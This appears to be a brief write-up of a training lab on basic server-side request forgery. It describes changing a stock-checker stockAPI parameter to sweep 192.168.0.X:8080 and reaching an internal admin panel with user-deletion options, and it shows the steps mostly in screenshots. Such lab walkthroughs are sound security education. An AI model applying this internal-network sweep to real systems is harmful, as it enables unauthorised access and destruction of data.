# Lab: Basic SSRF against another back-end system

The main web page<br>

<figure><img src="https://251574581-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlTgE7hbyi7mSyXsMcq44%2Fuploads%2Fpd0QX9sn4Va9wekDrQ9B%2Fimage.png?alt=media&#x26;token=a4ce06a4-c6b8-426c-aaba-5bd61eecaa52" alt=""><figcaption></figcaption></figure>

It has a stock checker functionality

<figure><img src="https://251574581-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlTgE7hbyi7mSyXsMcq44%2Fuploads%2FeNFBVpbnee2TyHt0hAHZ%2Fimage.png?alt=media&#x26;token=a4a78f8a-38e2-4004-8496-73d0fbb81f32" alt=""><figcaption></figcaption></figure>

If test it, you will see it sends a POST request which connects through stockAPI parameter to an internal system.

<figure><img src="https://251574581-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlTgE7hbyi7mSyXsMcq44%2Fuploads%2FoVjDxOXoAKFDCSW5SkJ7%2Fimage.png?alt=media&#x26;token=f3f4205b-cbc8-491c-b3b3-9bb10f94f64c" alt=""><figcaption></figcaption></figure>

Change it to 192.168.0.X:8080 as the exercise statement says and do a sweep on the network to see what works.\
Only can see a 200 through the access point (.1) and a 404 in .34. The other requests are http 500 internal server error.

<figure><img src="https://251574581-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlTgE7hbyi7mSyXsMcq44%2Fuploads%2FtFiCioWrdiBQF4429kY7%2Fimage.png?alt=media&#x26;token=a6c4cf2b-d577-4999-8d13-a3281aeb39bc" alt=""><figcaption></figcaption></figure>

Connecting to admin panel we could see both users and the option to delete them

<figure><img src="https://251574581-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlTgE7hbyi7mSyXsMcq44%2Fuploads%2FaN2PITIhejMDgWahPJxT%2Fimage.png?alt=media&#x26;token=6333bfc8-fdf9-49b2-8a08-2f0511e936ef" alt=""><figcaption></figcaption></figure>